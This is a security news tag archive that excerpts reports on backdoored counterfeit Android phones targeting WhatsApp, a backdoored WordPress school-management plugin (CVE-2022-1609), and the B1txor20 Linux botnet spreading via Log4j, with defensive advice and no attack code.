Tag Archive for: backdoor

Counterfeit Android Devices Revealed to Contain Backdoor Designed to Hack WhatsApp

/in


A team of mobile security researchers has discovered backdoors in the system partition of some budget Android device models that are counterfeit versions of known brand-name models. 

The malware, which the Doctor Web team first discovered in July 2022, was found in at least four different smartphones: ‘P48pro’, ‘radmi note 8’, ‘Note30u’ and ‘Mate40’.

“These incidents are united by the fact that the attacked devices were copycats of famous brand-name models,” Doctor Web wrote. “Moreover, instead of having one of the latest OS versions installed on them with the corresponding information displayed in the device details (for example, Android 10), they had the long outdated 4.4.2 version.”

According to the security researchers, the trojans target arbitrary code execution in the WhatsApp and WhatsApp Business messaging apps and could potentially be used in different attack scenarios.

“Among them is the interception of chats and the theft of the confidential information that could be found in them; this malware can also execute spam campaigns and various scam schemes,” Doctor Web wrote.

From a technical standpoint, the security researchers said their antivirus detected changes in two different system objects.

“To download modules, [the malware] connects to one of several C&C (command-and-control) servers, sending a request with a certain array of technical data about the device. In response, the server sends a list of plugins that the trojan will download, decrypt and run,” Doctor Web explained.

The mobile antivirus provider warned that the new malicious apps could be a member of the Android.FakeUpdates trojan family, often used by malicious actors to infiltrate various system components, including firmware updating software, the default settings app or the component responsible for the system graphical interface. 

“To avoid the risk of becoming a victim of these and other malicious programs, Doctor Web recommends that users purchase mobile devices in official stores and from reputable distributors,” the company added. “Using an anti-virus and installing all available OS updates is also important.”

The advisory comes days after Google…

Source…

Maintaining Access | Penetration Testing

/in



Backdoor baked into premium school management plugin for WordPress

/in


Backdoor baked into premium WordPress plugin for school management

Security researchers have discovered a backdoor in a premium WordPress plugin designed as a complete management solution for schools. The malicious code enables a threat actor to execute PHP code without authenticating.

The name of the plugin is “School Management,” published by Weblizar, and multiple versions before 9.9.7 were delivered with the backdoor baked into its code.

Although the latest version is clean, the developer failed to determine the source of the compromise.

The plugin allows schools to manage live classes, send email or SMS notifications, keep attendance boards and manage noticeboards, accept payments and issue invoices, manage exams, set up online lending libraries, and even manage transport vehicle fleets.

It is a complete solution that comes with an Android and iOS app to provide various access levels to users such as admins, teachers, accountants, students, parents, librarians, and receptionists.

PHP backdoor

Jetpack started to take a look at “School Management” (site not secure at the time of writing) after the WordPress.com support team reported finding malicious code in several sites using the plugin.

When looking at the lightly obfuscated code, Jetpack found a backdoor injected into the license-checking code of the plugin, which allows any attacker to execute PHP code.

The backdoor code after reversing obfuscation
The backdoor code after reversing obfuscation (Jetpack)

The backdoor can let an attacker access or alter the website’s contents, elevate privileges, and assume complete control of the site.

This is a critical security problem that is currently tracked as CVE-2022-1609, and received the maximum severity score of 10 out of 10.

Because the backdoor is injected in the license checking part of the plugin, the free version that doesn’t have one doesn’t contain the backdoor either, so it’s not impacted.

Discovery and fixing

Jetpack assumed that the presence of the backdoor was a case of a nulled plugin – a premium plugin that has been hacked or modified (pirated), distributed through third-party websites, that often work without a license

However, after discussing with the site owners, the analysts learned that the plugin was sourced directly from the vendor, so the backdoor…

Source…

New Linux backdoor that propagates via Log4j vulnerability easy to exploit in the cloud

/in


(“Java Logo” by mrjoro is licensed under CC BY-NC 2.0)

Researchers on Tuesday found a honeypot system capture an unknown executable and link (ELF) format Linux file propagating through a Log4j vulnerability.

In a blog post, 360Netlab researchers say that the network traffic generated by this sample triggered a DNS Tunnel alert in their system. The researchers investigated further and found a new botnet family which they named B1txor20 based on it using the file name “b1t,” the XOR algorithm, and the RC4 algorithm key length of 20 bytes.

The researchers said the new botnet is a backdoor for the Linux platform, tools that are easy to deploy in cloud environments. B1txor20 is capable of stealing sensitive data, installing rootkits, and creating reverse shells, when an attacker waits for a victim to initiate an outgoing connection.

Seeing a new botnet family leveraging the Log4j vulnerability and DNS tunneling for communication is interesting, but not unexpected, said Mike Parkin, senior technical engineer at Vulcan Cyber. Parkin said malware authors are known for quickly developing new strains to leverage recent vulnerabilities and combining different techniques to try and avoid detection.

“Fortunately, DNS tunneling is relatively easy to detect and multiple tools exist that can disrupt an attacker’s use of DNS for command and control,” Parkin said. “It’s easy to deploy these tools in a cloud environment as well as on-premises, and some form of DNS protection should be considered a best practice. While that wouldn’t stop the initial infection, it would effectively contain the breach since the attacker won’t be able to control the victim system. This new botnet does reinforce the need to patch for the Log4J vulnerability, and make sure the organization has the tools and capabilities to manage this kind of risk in their environment.”

This is a pretty thoughtfully designed piece of malware, said Casey Ellis, founder and CTO at Bugcrowd. Ellis said B1txor20 seems like it has been tailored towards targeting vulnerable Log4J instances inside Linux data centers which have otherwise been hardened.

“Limiting outbound connections is one of the key mitigations for Log4Shell, but…

Source…